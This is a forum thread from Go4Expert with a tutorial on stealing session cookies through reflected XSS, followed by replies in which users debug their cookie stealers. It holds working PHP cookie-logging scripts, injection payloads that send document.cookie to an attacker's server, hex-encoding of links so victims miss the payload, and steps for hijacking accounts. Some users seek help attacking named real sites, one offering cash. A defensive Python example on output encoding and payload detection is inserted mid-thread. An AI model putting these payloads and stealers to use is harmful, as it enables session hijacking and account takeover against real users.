Go4Expert


fourthdimension 23Apr2009 12:09

Stealing Cookie With XSS
 

Introduction



I thought it was about time for someone to post a cookie stealing tutorial, so I decided to write one for you from the ground up.

NOTE: Again... this was written to educate you on the security aspects of the following information, not to teach you how to break the law or do something stupid. Use what you learn from this to make your website more secure/use better browsing habits, not break into other websites.

Background



First, make sure you've read these two articles because I'm going to assume you already understand everything written in them:

XSS Complete Guide
All About Cookies and Security

Now we need to understand a bit more about how XSS actually works before moving on. From the above article, you already know a bit of the theory behind XSS, so we'll get right to the code. Let's say a web page has a search function that uses this code:

Code:

<tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr>

We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:

Code:

<script>alert("test")</script>

When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:

Code:

<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>

Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:

Code:

"><script>alert("test")</script>

This should close the quotes and end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed. Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example,

Code:

http://www.site.com/search.php?q="><script>alert("test")</script>

Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here:

Code:

http://centricle.com/tools/ascii-hex/

Hexing the query of this url gives us

Code:

http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2f%73%63%72%69%70%74%3e

The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.

Using XSS to Steal Cookies



OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?

The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):

Code:


<?php

function GetIP()
{
        if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
                $ip = getenv("HTTP_CLIENT_IP");
        else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
                $ip = getenv("HTTP_X_FORWARDED_FOR");
        else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
                $ip = getenv("REMOTE_ADDR");
        else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
                $ip = $_SERVER['REMOTE_ADDR'];
        else
                $ip = "unknown";
        return($ip);
}

function logData()
{
        $ipLog="log.txt";
        $cookie = $_SERVER['QUERY_STRING'];
        $register_globals = (bool) ini_get('register_gobals');
        if ($register_globals) $ip = getenv('REMOTE_ADDR');
        else $ip = GetIP();

        $rem_port = $_SERVER['REMOTE_PORT'];
        $user_agent = $_SERVER['HTTP_USER_AGENT'];
        $rqst_method = $_SERVER['METHOD'];
        $rem_host = $_SERVER['REMOTE_HOST'];
        $referer = $_SERVER['HTTP_REFERER'];
        $date=date ("l dS of F Y h:i:s A");
        $log=fopen("$ipLog", "a+");

        if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
                fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
        else
                fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
        fclose($log);
}

logData();

?>

This script will record the cookies of every user that views it.

Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:

Code:

"><script language= "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>

yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:

Code:

"><a href="#" onclick="document.location='http://yoursite.com/whateveryouwant.php?cookie=' +escape(document.cookie);"><Click Me></a></script>

This will eliminate the looping problem since the user has to click on it for it to work, and it's only a one-way link. Of course, then the user's trail ends at your cookie stealing script, so you'd need to modify that code a little to keep them from suspecting what's going on. You could just add some text to the page saying something like "under construction" by changing the end of our php script from this:

Code:

logData();
?>

to this:

Code:

logData();

echo '<b>Page Under Construction</b>'
?>

Now when you open log.txt, you should see something like this:

Code:


IP: 125.16.48.169 | PORT: 56840 | HOST:  |  Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD:  | REF: http://www.ifa.org.nz/search.php | 

DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE:  cookie=PHPSESSID=889c6594db2541db1666cefca7537373

You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.

Summary



So in summary:
1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer php file and log file to your server.
3. Insert the injection into the page via the url or text box.
4. Grab the link of that page with your exploited search query (if injection is not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.

References



I originally posted this article on TechMafias.com but reposted it here for the go4expert community.
Code:

http://techmafias.com/forum/Thread-tutorial-cookie-stealing-with-xss
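
The test injection and hex-encoded URL from the article above, seen from the defender's side, as an added example that is not part of the original post: it shows the payload escaping the value attribute, the same input neutralised by output encoding, and a scan that flags the payload in request URLs even after the query has been hexed. The helper names, the SIGNS patterns and the sample requests are assumptions constructed for this example.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, unquote, urlsplit

# Test injection and hex-encoded URL taken from the post.
PAYLOAD = '"><script>alert("test")</script>'
ENCODED_URL = ("http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e"
               "%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2f%73%63%72%69%70%74%3e")

# The search field from the post, with a slot for the reflected search term.
FIELD = ('<tr><td>Name</td><td><input type="text" name="advisor_name" '
         'value="{}"></td></tr>')


def render_vulnerable(term):
    """Reflect the term into value="..." unchanged: the flaw described above."""
    return FIELD.format(term)


def render_hardened(term):
    """Encode & < > " ' so the term can never close the attribute or the tag."""
    return FIELD.format(html.escape(term, quote=True))


class _TagRecorder(HTMLParser):
    """Records each start tag and the decoded value of every <input>."""

    def __init__(self):
        super().__init__()
        self.tags, self.values = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.values.append(dict(attrs).get("value"))


def parse(markup):
    """Return (start tags, input values) as an HTML parser sees the markup."""
    recorder = _TagRecorder()
    recorder.feed(markup)
    recorder.close()
    return recorder.tags, recorder.values


# Heuristic signs of a reflected-XSS attempt in a decoded parameter (assumed set).
SIGNS = {
    "attribute breakout": re.compile(r"""["']\s*/?>"""),
    "script tag": re.compile(r"<script\b", re.I),
    "cookie access": re.compile(r"document\s*\.\s*cookie", re.I),
}


def decode_fully(value, rounds=3):
    """Undo leftover percent-encoding layers so double-hexed input is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_request(url):
    """Return {parameter: [signs]} for query parameters that look injected."""
    findings = {}
    query = urlsplit(url).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        hits = [s for s, rx in SIGNS.items() if rx.search(decode_fully(value))]
        if hits:
            findings[name] = hits
    return findings


# Constructed request targets: benign quoted search, the post's URL, double-encoded.
SAMPLE_REQUESTS = [
    "/search.php?q=%22quoted+phrase%22",
    ENCODED_URL,
    "/search.php?q=%2522%253E%253Cscript%253Ealert(document.cookie)"
    "%253C%252Fscript%253E",
]

if __name__ == "__main__":
    print(parse(render_vulnerable(PAYLOAD)))
    print(parse(render_hardened(PAYLOAD)))
    for request in SAMPLE_REQUESTS:
        print(scan_request(request) or "clean", "<-", request)
```

Output encoding is the fix; the scan is only a detection aid for logs and will miss payloads that avoid these three patterns. Setting the session cookie's HttpOnly flag additionally keeps it out of document.cookie.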

shabbir 23Apr2009 12:52

Re: Stealing Cookie With XSS
 
Nice Article :D

fourthdimension 23Apr2009 21:14

Re: Stealing Cookie With XSS
 
Thanks :)

indiansword 26Apr2009 23:29

Re: Stealing Cookie With XSS
 
If you guys want to practice these XSS and if you can't find a vulnerable website, then you can try the following link.

www.TechMafias.com/xss_practice

hanleyhansen 27Apr2009 19:55

Re: Stealing Cookie With XSS
 
Nice.

namesis 28Apr2009 07:49

Re: Stealing Cookie With XSS
 
nice, thanks.

shabbir 3May2009 11:57

Re: Stealing Cookie With XSS
 
Nominate this article of the month for April 2009

fourthdimension 7May2009 12:03

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by shabbir (Post 46941)

Apparently it's not eligible.

shabbir 7May2009 13:14

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by fourthdimension (Post 47244)
Apparently it's not eligible.

Agreed. Sorry for the confusion.

fourthdimension 7May2009 17:51

Re: Stealing Cookie With XSS
 
No problem.

m93 13Nov2009 23:35

Re: Stealing Cookie With XSS
 
tnx. it was very useful

i have some questions.
if i give the users cookies. can i manage that cookie (for refresh) except firefox (for example opera. manage cookies in opera is easy) and i must edit sid yes? tnx
(i inserted the link in phpbb forum. when the users click on that their cookie save in log.txt? and for refresh their cookies i don't need the usernames?)

tnx

Toddie 9Jan2010 11:12

Re: Stealing Cookie With XSS
 
I am testing a xss vulnerability but your script does not work.
your script redirects but does not log cookies.

I am using this script right now and it works fine.

xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script>

when i use this injection code cookies are logged into cookies.txt via this script

cookiestealer.php
Quote:

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookies.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both.


I tried your script and it does not work.
why does your script not log cookies? where is the error? If you can't answer that question then here is another question.

what do I need to do to get my script able to redirect to another page after it executes?

m93 11Jan2010 14:13

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by Toddie (Post 62837)
I am testing a xss vulnerability but your script does not work.
your script redirects but does not log cookies.

I am using this script right now and it works fine.

xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script>

when i use this injection code cookies are logged into cookies.txt via this script

cookiestealer.php


This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both.


I tried your script and it does not work.
why does your script not log cookies? where is the error? If you can't answer that question then here is another question.

what do I need to do to get my script able to redirect to another page after it executes?

i downloaded the scriptsthis topic. script doesnt have problem? plz explain if i want steal users cookie (in forums) what should i do? (step by step) tnx a lot

Toddie 12Jan2010 21:41

Re: Stealing Cookie With XSS
 
now this is instructions for my script.
you need to use cookiestealer.php from my post.
you can add h t t p : / / w w w . before the sites name yourself because it will not allow me to post them with this because it gives me an error saying I have too many live links in my post. (take out the spaces)

step 1: find an injection point. i assume you have already done all of this.
for me i found this url because i could not find a place to inject it into a page.
site.com/forums/search.php?query=123456

step 2:
i then erase 123456 and add "> for my injection.

then I add the code I want it to do.

<script>alert(document.cookie);</script>

here is the finished url. if it works, then you will get a popup box that gives you your cookie.

site.com/forums/search.php?query="><script>alert(document.cookie); </script>

step 3: you need to add files to your own server.
for me the files were cookiestealer.php and cookie.txt.
you can find cookiestealer.php in my post and you can create cookie.txt
cookie.txt is an empty .txt file.

step 4:
then you post this link or send it in pm and get people to click it
site.com/forums/search.php?query="><script>document.location='MYsi te.com/cookiestealer.php?cookie='+escape(document.cookie) </script>

now when someone clicks that link their cookie will be saved in cookie.txt on your server.
you just edit the cookie with firebug or whatever you use so that the info in the cookie is replaced with the victims cookie.

step 5:
refresh the page you are on at the site and you should be logged in as that user without needing to enter user name or password or anything.

*if you are trying to steal the cookies of an admin you should know that most administrator control panels force you to re-enter your password to access the administrator control panel so cookies will not allow you to access this. you can usually moderate the forums without any password prompt though. but of course as soon as they see this they will fix whatever you did.

__________________________________________________ _________________________________

now if someone could kindly tell me how to redirect this cookiestealer.php page to another webpage?
otherwise its obvious to the victim that they just got their cookie stolen!

anyone?

this should be simple code but I guess I just don't understand the ins and outs of the code.
I tried a few different ways to redirect the page but none are working. I understand what I need to add for code and I am able to make the page redirect under normal circumstances, but the problem is that the code conflicts with the other code I have and either renders it unworkable or simply redirects the page without allowing the code to execute. I am sure its a simple syntax error or placement of the code for an experienced user it would be easy to find. like I said i tried to redirect in the url itself and in the cookiestealer.php file but I cannot get it to function correctly.

here is one example I tried to add to the file but it does not work.
echo '<script type="text/javascript">setTimeout("location.href=\'newsite.co m\'",1*1000)</script>';

please help with this.

farnoise 14Jan2010 06:11

Re: Stealing Cookie With XSS
 
Just great,
Really straightforward. The only problem that I'm having is it's not sending me the COOKIE; I have everything else but not the cookie.
Here is a sample line of my log file


IP: 24.132.23.14 | PORT: 52020 | HOST: | Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.31318; .NET CLR 3.5.30729) | METHOD: | REF: facebook.com | DATE: Wednesday 13th 2010f January 2010 06:48:06 PM | COOKIE:



I'd appreciate any help and thanks again

Toddie 14Jan2010 09:44

Re: Stealing Cookie With XSS
 
yeah i already made a comment that the script does not work. I do not know why perhaps it is outdated and only used for older browsers.

at least it prints information for you. for me the file remained blank and nothing was printed.

the script I provided is very simple and works. it gives you the cookie and nothing else... which is all you really need anyways.

I am still waiting for someone to take a look at my script and figure out how to make it redirect to a new page while retaining the functionality of the script itself.

I have a feeling I should not hold my breath.

indiansword 15Jan2010 01:58

Re: Stealing Cookie With XSS
 
This should help

PHP Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: http://www.yourhost.com");
?>


Toddie 15Jan2010 02:09

Re: Stealing Cookie With XSS
 
That did not work.

What that did is write all information EXCEPT the cookie. and also it did not redirect the page.

indiansword 15Jan2010 02:11

Re: Stealing Cookie With XSS
 
it works fine. There should be something tricky on the site that you're trying it on. what's the script you're using to steal the cookies?

Toddie 15Jan2010 02:36

Re: Stealing Cookie With XSS
 
I am not able to inject the code into the site. I am Injecting it into a search query.
The "victim" must click on the link either in a post or a pm that I send them.

Here is an example of the link.
I changed the site name for confidentiality purposes of course.

h t t p : / / w w w .victimsite.com/forums/search.php?query="><script>document.location='h t t p : / / w w w.mysite.com/cookiestealer.php?cookie='+escape(document.cookie) </script>

when I use your script with that link, it displays the info except for the cookie and also it does not redirect.

the script I mention in my first post does work, and i really only need the cookie not all the other info but I would like to get it to redirect which it currently does not.

Also i might note that I tried putting a redirect in the url itself but then the cookiestealer.php does not do anything at all and it simply redirects without logging anything.

if you would like to test it out on your own test server or some free site then I can pm you more details about what the site is that I am doing this on.

indiansword 15Jan2010 10:38

Re: Stealing Cookie With XSS
 
The script that you are trying is wrong. Try this:

http:// w w w .victimsite.com/forums/search.php?query="><script>document.location="http ://yoursite.com/cookiestealer?c=" + document.cookie</script>

Toddie 15Jan2010 22:46

Re: Stealing Cookie With XSS
 
Thank you for your timely responses.

After using that code I am now getting the information and the cookie logged properly.
however the page still does not redirect.

I am using firefox 3.5.7 I don't know if that makes any difference.

indiansword 15Jan2010 22:47

Re: Stealing Cookie With XSS
 
pm me with the info..

Toddie 17Jan2010 05:40

Re: Stealing Cookie With XSS
 
turns out the issue is the host, the code works fine.

m93 16Feb2010 12:34

Re: Stealing Cookie With XSS
 
if i want test this script on myself what should i do? (logging in a forum or test that in firefox or ie?)

ginoside021 10Apr2010 18:47

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by indiansword (Post 63019)
pm me with the info..

can you teach me how to make this cookiestealer

indiansword 10Apr2010 20:31

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by ginoside021 (Post 66969)
can you teach me how to make this cookiestealer

Go through this entire thread. I think i have explained most of the things.

ginoside021 11Apr2010 19:10

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by indiansword (Post 66970)
Go through this entire thread. I think i have explained most of the things.

i tried to make one following the tut but mine is not working, can you help me pls

i add you in my yahoo inocentjacky is my yahoo ID plssss

shadowman32 26Jun2010 22:10

Re: Stealing Cookie With XSS
 
i dont understand something...

for example if i put this cod as a index page

<a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+
document.cookie)">Click Me</a>

and then send a pm to the victim to acces the link tefutingat.net23.net/steal the script will work? note that the script will open the index page and when the victim click click me the script will do his job

i guess i do something wrong because none of them works. below are the stealer script that i use:
1
HTML Code:

<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

2
HTML Code:

<?php

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}

logData();

echo '<b>Page Under Construction</b>'

?>

3
HTML Code:

<?php
$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br>
IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location:TechMafias”);
?>

Please help me...my account on a web site was stolen and i want to get it back.

Toddie 26Jun2010 22:34

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by shadowman32 (Post 69672)

i guess i do something wrong because none of them works. below are the stealer script that i use:

try using a different web host.

shadowman32 27Jun2010 02:34

Re: Stealing Cookie With XSS
 
i have changed the host but it still doesn't work...i get something like this

HTML Code:

IP: 92.83.149.140 | PORT: 25710 | HOST:  |  Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.25 Safari/532.5 | METHOD:  | REF: h t t p ://extra-ratie.hi2.ro/ |  DATE: Saturday 26th 2010f June 2010 11:54:17 PM | COOKIE:  cookie=

the script doesn't "steal" the cookie...

Can someone give me a good script?...i want to send the link that victim will access via PM.

m93 29Jun2010 15:45

Re: Stealing Cookie With XSS
 
this code is completely out of work!!! it didn't work for me. i think it's better to forget about stealing cookie..i couldn't find useful codes anywhere

shadowman32 30Jun2010 13:31

Re: Stealing Cookie With XSS
 
i will keep searching until i find a good XSS cookie stealer script...and i will post it here when i find it.

thanks for help

rayjay 12Jan2011 08:29

Re: Stealing Cookie With XSS
 
for example if i put this cod as a index page

<a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+
document.cookie)">Click Me</a>

and then send a pm to the victim to acces the link tefutingat.net23.net/steal the script will work? note that the script will open the index page and when the victim click click me the script will do his job

i guess i do something wrong because none of them works. below are the stealer script that i use:
1
HTML Code:

<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

2
HTML Code:

<?php

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) &&  $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],  "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : }  $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE:  $date | COOKIE:  $cookie \n\n");
    fclose($log);
}

logData();

echo '<b>Page Under Construction</b>'

?>

3
HTML Code:

<?php
$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br>
IP: ‘ .$ip. ‘<br> Date  and Time: ‘ .$date. ‘<br> Referer:  ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location:TechMafias”);
?>

Please help me...my account on a web site was stolen and i want to get it back.

rayjay 12Jan2011 08:30

Re: Stealing Cookie With XSS
 
Does anybody know where my code doesn't work? It displays everything but the cookie. The site is kind of trick but it allows [img][/img] and .. which translates into html code as <img src=""></img> and <a href=""></a>.

My PHP:

1
HTML Code:

<?php
$cookie =$HTTP_GET_VARS["cookie"];
$date = date ("l ds of F Y h:i:s A");
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('log.txt', 'a');
fwrite($file,"DATE : $date || IP: $ip || COOKIE : $cookie \n");
fclose($file);
?>

I've tried many different modifications on the site. For example,

rayjay 12Jan2011 08:33

Re: Stealing Cookie With XSS
 
I can't understand how this forum works properly lol. The website is crossfire.nu if that helps anybody. Posts are done via UBBcode. I hope somebody can help.

Indianman, tenu punjabi aandi ah?

rayjay 12Jan2011 08:44

Re: Stealing Cookie With XSS
 
So if somebody can tell me the problem it would be really nice .. anybody that is willing to help me and can help me steal cookies of this site will receive a cash reward as well :P

marehotz 28Feb2011 20:18

Re: Stealing Cookie With XSS
 
admin , i want to hack a lineage 2 website and log as administrator . Is that possible? pls reply



Thx.

Mr.sp41t3r 18May2011 18:14

Re: Stealing Cookie With XSS
 
thank you

nikita 13Dec2012 16:42

Re: Stealing Cookie With XSS
 
sir my log.txt file contains only JSESSIONID=some value;

can u pls tell me what to do with JSESSIONID.

